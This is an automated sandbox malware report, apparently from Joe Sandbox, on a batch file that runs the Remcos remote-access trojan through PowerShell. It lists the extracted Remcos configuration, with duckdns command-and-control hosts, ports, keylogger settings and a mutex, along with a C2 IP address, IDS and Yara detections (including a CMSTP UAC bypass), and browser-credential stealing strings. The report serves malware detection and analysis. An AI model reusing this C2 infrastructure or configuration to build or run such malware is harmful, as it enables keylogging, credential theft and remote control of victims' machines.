Source: sarok7lmoutsg5.duckdns.org	Avira URL Cloud: Label: malware
Source: sarok7lmoutsg3.duckdns.org	Avira URL Cloud: Label: malware
Source: sarok7lmoutsg1.duckdns.org	Avira URL Cloud: Label: malware
Source: sarok7lmoutsg4.duckdns.org	Avira URL Cloud: Label: malware
Source: sarok7lmoutsg2.duckdns.org	Avira URL Cloud: Label: malware

Found malware configuration

Source: 5.2.powershell.exe.8a51288.5.raw.unpack

Malware Configuration Extractor: Remcos {"Host:Port:Password": ["sarok7lmoutsg1.duckdns.org:3990:0", "sarok7lmoutsg1.duckdns.org:3991:1", "sarok7lmoutsg2.duckdns.org:3990:0", "sarok7lmoutsg3.duckdns.org:3990:0", "sarok7lmoutsg4.duckdns.org:3990:0", "sarok7lmoutsg5.duckdns.org:3990:0"], "Assigned name": "Year", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Enable", "Hide file": "Disable", "Mutex": "klmiurtg-1R3I3X", "Keylog flag": "1", "Keylog path": "AppData", "Keylog file": "kalmzots.dat", "Keylog crypt": "Disable", "Hide keylog file": "Enable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": ""}

Multi AV Scanner detection for submitted file

Source: z310517827.bat

Virustotal: Detection: 9%

Perma Link

Yara detected Remcos RAT

Source: Yara match	File source: 5.2.powershell.exe.8a51288.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.powershell.exe.8a51288.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.3682683919.0000000008B29000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3682024098.0000000008A50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 7976, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Roaming\kalmzots.dat, type: DROPPED

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.9% probability

Source: powershell.exe, 00000005.00000002.3682683919.0000000008B29000.00000002.10000000.00040000.00000000.sdmp

Binary or memory string: -----BEGIN PUBLIC KEY-----

memstr_e1a87e25-9

Exploits

Yara detected UAC Bypass using CMSTP

Source: Yara match	File source: 5.2.powershell.exe.8a51288.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.powershell.exe.8a51288.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.3682683919.0000000008B29000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3682024098.0000000008A50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 7976, type: MEMORYSTR

Source:

Binary string: c:\Projects\VS2005\WebBrowserPassView\Command-Line\WebBrowserPassView.pdb source: powershell.exe, 00000005.00000002.3694477721.000000000B820000.00000040.10000000.00040000.00000000.sdmp, recover.exe, recover.exe, 0000000C.00000002.1571994329.0000000000400000.00000040.80000000.00040000.00000000.sdmp

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_100010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	5_2_100010F1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_10006580 FindFirstFileExA,	5_2_10006580
Source: C:\Windows\SysWOW64\recover.exe	Code function: 12_2_0040B477 FindFirstFileW,FindNextFileW,	12_2_0040B477
Source: C:\Windows\SysWOW64\recover.exe	Code function: 13_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,	13_2_00407EF8
Source: C:\Windows\SysWOW64\recover.exe	Code function: 16_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,	16_2_00407898

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49721 -> 176.65.142.140:3990
Source: Network traffic	Suricata IDS: 2032777 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Server Response : 176.65.142.140:3990 -> 192.168.2.4:49721

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: sarok7lmoutsg1.duckdns.org
Source: Malware configuration extractor	URLs: sarok7lmoutsg1.duckdns.org
Source: Malware configuration extractor	URLs: sarok7lmoutsg2.duckdns.org
Source: Malware configuration extractor	URLs: sarok7lmoutsg3.duckdns.org
Source: Malware configuration extractor	URLs: sarok7lmoutsg4.duckdns.org
Source: Malware configuration extractor	URLs: sarok7lmoutsg5.duckdns.org

Uses dynamic DNS services

Source: unknown	DNS query: name: sarok7lmoutsg2.duckdns.org
Source: unknown	DNS query: name: sarok7lmoutsg3.duckdns.org
Source: unknown	DNS query: name: sarok7lmoutsg5.duckdns.org
Source: unknown	DNS query: name: sarok7lmoutsg4.duckdns.org
Source: unknown	DNS query: name: sarok7lmoutsg1.duckdns.org

Source: global traffic

TCP traffic: 192.168.2.4:49721 -> 176.65.142.140:3990

Source: global traffic

HTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache

Source: Joe Sandbox View

IP Address: 178.237.33.50 178.237.33.50

Source: Network traffic

Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49723 -> 178.237.33.50:80

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

HTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache

Source: powershell.exe, 00000005.00000002.3694477721.000000000B820000.00000040.10000000.00040000.00000000.sdmp, recover.exe, 0000000C.00000002.1571994329.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: @dllhost.exetaskhost.exetaskhostex.exebhvContainersContainerIdNameHistoryContainer_%I64dAccessCountCreationTimeExpiryTimeAccessedTimeModifiedTimeUrlEntryIDvisited:Microsoft\Windows\WebCache\WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.dathttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
Source: powershell.exe, 00000005.00000002.3694477721.000000000B820000.00000040.10000000.00040000.00000000.sdmp, recover.exe, 0000000C.00000002.1571994329.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: @dllhost.exetaskhost.exetaskhostex.exebhvContainersContainerIdNameHistoryContainer_%I64dAccessCountCreationTimeExpiryTimeAccessedTimeModifiedTimeUrlEntryIDvisited:Microsoft\Windows\WebCache\WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.dathttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
Source: powershell.exe, 00000005.00000002.3676317602.0000000007340000.00000040.10000000.00040000.00000000.sdmp, recover.exe, 00000010.00000002.1560403582.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
Source: powershell.exe, 00000005.00000002.3676317602.0000000007340000.00000040.10000000.00040000.00000000.sdmp, recover.exe, recover.exe, 00000010.00000002.1560403582.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
Source: recover.exe	String found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
Source: recover.exe, 0000000C.00000003.1571760999.0000000004781000.00000004.00000020.00020000.00000000.sdmp, recover.exe, 0000000C.00000003.1571871550.0000000004784000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: s://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srffile:///C:/Windows/system32/oobe/FirstLogonAnim.htmlfile://192.168.2.1/all/install/setup.au3file://192.168.2.1/all/ProfessionalRetail.imgfile://192.168.2.1/all/Professional2019Retail.imgres://C:\Windows\system32\mmcndmgr.dll/views.htmhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login? equals www.facebook.com (Facebook)
Source: recover.exe, 0000000C.00000003.1571760999.0000000004781000.00000004.00000020.00020000.00000000.sdmp, recover.exe, 0000000C.00000003.1571871550.0000000004784000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: s://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srffile:///C:/Windows/system32/oobe/FirstLogonAnim.htmlfile://192.168.2.1/all/install/setup.au3file://192.168.2.1/all/ProfessionalRetail.imgfile://192.168.2.1/all/Professional2019Retail.imgres://C:\Windows\system32\mmcndmgr.dll/views.htmhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login? equals www.yahoo.com (Yahoo)

Source: global traffic	DNS traffic detected: DNS query: sarok7lmoutsg1.duckdns.org
Source: global traffic	DNS traffic detected: DNS query: sarok7lmoutsg2.duckdns.org
Source: global traffic	DNS traffic detected: DNS query: sarok7lmoutsg3.duckdns.org
Source: global traffic	DNS traffic detected: DNS query: sarok7lmoutsg4.duckdns.org
Source: global traffic	DNS traffic detected: DNS query: sarok7lmoutsg5.duckdns.org
Source: global traffic	DNS traffic detected: DNS query: geoplugin.net

Source: bhvFB86.tmp.12.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: bhvFB86.tmp.12.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
Source: powershell.exe, 00000005.00000002.3677060324.0000000007500000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.micro9
Source: bhvFB86.tmp.12.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
Source: bhvFB86.tmp.12.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: bhvFB86.tmp.12.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: powershell.exe, 00000005.00000002.3680600008.0000000008407000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3677060324.0000000007500000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3677060324.0000000007571000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3677060324.0000000007566000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3677060324.00000000075E9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gp
Source: powershell.exe, 00000005.00000002.3677060324.0000000007571000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gp%Mq
Source: powershell.exe, 00000005.00000002.3682683919.0000000008B29000.00000002.10000000.00040000.00000000.sdmp, powershell.exe, 00000005.00000002.3682024098.0000000008A50000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gp/C
Source: powershell.exe, 00000005.00000002.3677060324.0000000007571000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gpF_
Source: powershell.exe, 00000005.00000002.3680600008.0000000008407000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gpSystem32
Source: powershell.exe, 00000005.00000002.3677060324.0000000007500000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gpi
Source: powershell.exe, 00000005.00000002.3668466296.0000000005F7C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: bhvFB86.tmp.12.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: powershell.exe, 00000005.00000002.3664871938.000000000506D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000005.00000002.3664871938.0000000004F11000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000005.00000002.3664871938.000000000506D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000005.00000002.3676317602.0000000007340000.00000040.10000000.00040000.00000000.sdmp, recover.exe, recover.exe, 00000010.00000002.1560403582.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.ebuddy.com
Source: powershell.exe, 00000005.00000002.3676317602.0000000007340000.00000040.10000000.00040000.00000000.sdmp, recover.exe, recover.exe, 00000010.00000002.1560403582.0000000000400000.00000040.80000000.00040000.00000000.sdmp, recover.exe, 00000010.00000003.1560131989.000000000368C000.00000004.00000020.00020000.00000000.sdmp, recover.exe, 00000010.00000003.1559693994.000000000368C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.imvu.com
Source: powershell.exe, 00000005.00000002.3676317602.0000000007340000.00000040.10000000.00040000.00000000.sdmp, recover.exe, 00000010.00000002.1560403582.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
Source: powershell.exe, 00000005.00000002.3676317602.0000000007340000.00000040.10000000.00040000.00000000.sdmp, recover.exe, 00000010.00000002.1560403582.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.imvu.comr
Source: recover.exe, 00000010.00000003.1560131989.000000000368C000.00000004.00000020.00020000.00000000.sdmp, recover.exe, 00000010.00000003.1559693994.000000000368C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.imvu.comta
Source: recover.exe, 0000000C.00000002.1572087584.00000000027D3000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://www.nirsoft.net
Source: recover.exe, 00000010.00000002.1560403582.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.nirsoft.net/
Source: powershell.exe, 00000005.00000002.3664871938.0000000004F11000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000005.00000002.3668466296.0000000005F7C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000005.00000002.3668466296.0000000005F7C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000005.00000002.3668466296.0000000005F7C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000005.00000002.3664871938.000000000506D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: recover.exe, 0000000C.00000003.1571760999.0000000004781000.00000004.00000020.00020000.00000000.sdmp, recover.exe, 0000000C.00000003.1571871550.0000000004784000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.liv
Source: recover.exe	String found in binary or memory: https://login.yahoo.com/config/login
Source: powershell.exe, 00000005.00000002.3668466296.0000000005F7C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000005.00000002.3676317602.0000000007340000.00000040.10000000.00040000.00000000.sdmp, recover.exe, recover.exe, 00000010.00000002.1560403582.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: recover.exe	String found in binary or memory: https://www.google.com/accounts/servicelogin

Key, Mouse, Clipboard, Microphone and Screen Capturing

Installs a global keyboard hook

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Windows user hook set: 0 keyboard low level C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Jump to behavior

Source: C:\Windows\SysWOW64\recover.exe

Code function: 12_2_0041138D OpenClipboard,GetLastError,DeleteFileW,

12_2_0041138D

Source: C:\Windows\SysWOW64\recover.exe	Code function: 12_2_00409E39 EmptyClipboard,wcslen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,	12_2_00409E39
Source: C:\Windows\SysWOW64\recover.exe	Code function: 12_2_00409EA1 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,	12_2_00409EA1
Source: C:\Windows\SysWOW64\recover.exe	Code function: 13_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,	13_2_00406DFC
Source: C:\Windows\SysWOW64\recover.exe	Code function: 13_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,	13_2_00406E9F
Source: C:\Windows\SysWOW64\recover.exe	Code function: 16_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,	16_2_004068B5
Source: C:\Windows\SysWOW64\recover.exe	Code function: 16_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,	16_2_004072B5

Source: Yara match	File source: 5.2.powershell.exe.8a51288.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.powershell.exe.8a51288.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.3682683919.0000000008B29000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3682024098.0000000008A50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 7976, type: MEMORYSTR

E-Banking Fraud

Yara detected Remcos RAT

Source: Yara match	File source: 5.2.powershell.exe.8a51288.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.powershell.exe.8a51288.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.3682683919.0000000008B29000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3682024098.0000000008A50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 7976, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Roaming\kalmzots.dat, type: DROPPED

System Summary

Malicious sample detected (through community Yara rule)

Source: 5.2.powershell.exe.8a51288.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 5.2.powershell.exe.8a51288.5.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 5.2.powershell.exe.8a51288.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 5.2.powershell.exe.8a51288.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 5.2.powershell.exe.8a51288.5.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 5.2.powershell.exe.8a51288.5.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 00000005.00000002.3682683919.0000000008B29000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000005.00000002.3682024098.0000000008A50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000005.00000002.3689629684.000000000AA0D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000005.00000002.3674098163.0000000006A82000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000005.00000002.3668466296.00000000066EE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: Process Memory Space: powershell.exe PID: 7976, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: powershell.exe PID: 7976, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process Stats: CPU usage > 49%

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_06AFF3B0 NtCreateSection,NtMapViewOfSection,NtUnmapViewOfSection,NtMapViewOfSection,	5_2_06AFF3B0
Source: C:\Windows\SysWOW64\recover.exe	Code function: 12_2_0040BAE3 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,	12_2_0040BAE3
Source: C:\Windows\SysWOW64\recover.exe	Code function: 13_2_004016FD NtdllDefWindowProc_A,	13_2_004016FD
Source: C:\Windows\SysWOW64\recover.exe	Code function: 13_2_004017B7 NtdllDefWindowProc_A,	13_2_004017B7
Source: C:\Windows\SysWOW64\recover.exe	Code function: 16_2_00402CAC NtdllDefWindowProc_A,	16_2_00402CAC
Source: C:\Windows\SysWOW64\recover.exe	Code function: 16_2_00402D66 NtdllDefWindowProc_A,	16_2_00402D66

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_10017194	5_2_10017194
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_1000B5C1	5_2_1000B5C1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_06AFF3B0	5_2_06AFF3B0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_07632FE4	5_2_07632FE4
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_07632F92	5_2_07632F92
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_07631298	5_2_07631298
Source: C:\Windows\SysWOW64\recover.exe	Code function: 12_2_0044A030	12_2_0044A030
Source: C:\Windows\SysWOW64\recover.exe	Code function: 12_2_0040612B	12_2_0040612B
Source: C:\Windows\SysWOW64\recover.exe	Code function: 12_2_0043E13D	12_2_0043E13D
Source: C:\Windows\SysWOW64\recover.exe	Code function: 12_2_0044B188	12_2_0044B188
Source: C:\Windows\SysWOW64\recover.exe	Code function: 12_2_00442273	12_2_00442273
Source: C:\Windows\SysWOW64\recover.exe	Code function: 12_2_0044D380	12_2_0044D380
Source: C:\Windows\SysWOW64\recover.exe	Code function: 12_2_0044A5F0	12_2_0044A5F0
Source: C:\Windows\SysWOW64\recover.exe	Code function: 12_2_004125F6	12_2_004125F6
Source: C:\Windows\SysWOW64\recover.exe	Code function: 12_2_004065BF	12_2_004065BF
Source: C:\Windows\SysWOW64\recover.exe	Code function: 12_2_004086CB	12_2_004086CB
Source: C:\Windows\SysWOW64\recover.exe	Code function: 12_2_004066BC	12_2_004066BC
Source: C:\Windows\SysWOW64\recover.exe	Code function: 12_2_0044D760	12_2_0044D760
Source: C:\Windows\SysWOW64\recover.exe	Code function: 12_2_00405A40	12_2_00405A40
Source: C:\Windows\SysWOW64\recover.exe	Code function: 12_2_00449A40	12_2_00449A40
Source: C:\Windows\SysWOW64\recover.exe	Code function: 12_2_00405AB1	12_2_00405AB1
Source: C:\Windows\SysWOW64\recover.exe	Code function: 12_2_00405B22	12_2_00405B22
Source: C:\Windows\SysWOW64\recover.exe	Code function: 12_2_0044ABC0	12_2_0044ABC0
Source: C:\Windows\SysWOW64\recover.exe	Code function: 12_2_00405BB3	12_2_00405BB3
Source: C:\Windows\SysWOW64\recover.exe	Code function: 12_2_00417C60	12_2_00417C60
Source: C:\Windows\SysWOW64\recover.exe	Code function: 12_2_0044CC70	12_2_0044CC70
Source: C:\Windows\SysWOW64\recover.exe	Code function: 12_2_00418CC9	12_2_00418CC9
Source: C:\Windows\SysWOW64\recover.exe	Code function: 12_2_0044CDFB	12_2_0044CDFB
Source: C:\Windows\SysWOW64\recover.exe	Code function: 12_2_0044CDA0	12_2_0044CDA0
Source: C:\Windows\SysWOW64\recover.exe	Code function: 12_2_0044AE20	12_2_0044AE20
Source: C:\Windows\SysWOW64\recover.exe	Code function: 12_2_00415E3E	12_2_00415E3E
Source: C:\Windows\SysWOW64\recover.exe	Code function: 12_2_00437F3B	12_2_00437F3B
Source: C:\Windows\SysWOW64\recover.exe	Code function: 13_2_00405038	13_2_00405038
Source: C:\Windows\SysWOW64\recover.exe	Code function: 13_2_0041208C	13_2_0041208C
Source: C:\Windows\SysWOW64\recover.exe	Code function: 13_2_004050A9	13_2_004050A9
Source: C:\Windows\SysWOW64\recover.exe	Code function: 13_2_0040511A	13_2_0040511A
Source: C:\Windows\SysWOW64\recover.exe	Code function: 13_2_0043C13A	13_2_0043C13A
Source: C:\Windows\SysWOW64\recover.exe	Code function: 13_2_004051AB	13_2_004051AB
Source: C:\Windows\SysWOW64\recover.exe	Code function: 13_2_00449300	13_2_00449300
Source: C:\Windows\SysWOW64\recover.exe	Code function: 13_2_0040D322	13_2_0040D322
Source: C:\Windows\SysWOW64\recover.exe	Code function: 13_2_0044A4F0	13_2_0044A4F0
Source: C:\Windows\SysWOW64\recover.exe	Code function: 13_2_0043A5AB	13_2_0043A5AB
Source: C:\Windows\SysWOW64\recover.exe	Code function: 13_2_00413631	13_2_00413631
Source: C:\Windows\SysWOW64\recover.exe	Code function: 13_2_00446690	13_2_00446690
Source: C:\Windows\SysWOW64\recover.exe	Code function: 13_2_0044A730	13_2_0044A730
Source: C:\Windows\SysWOW64\recover.exe	Code function: 13_2_004398D8	13_2_004398D8
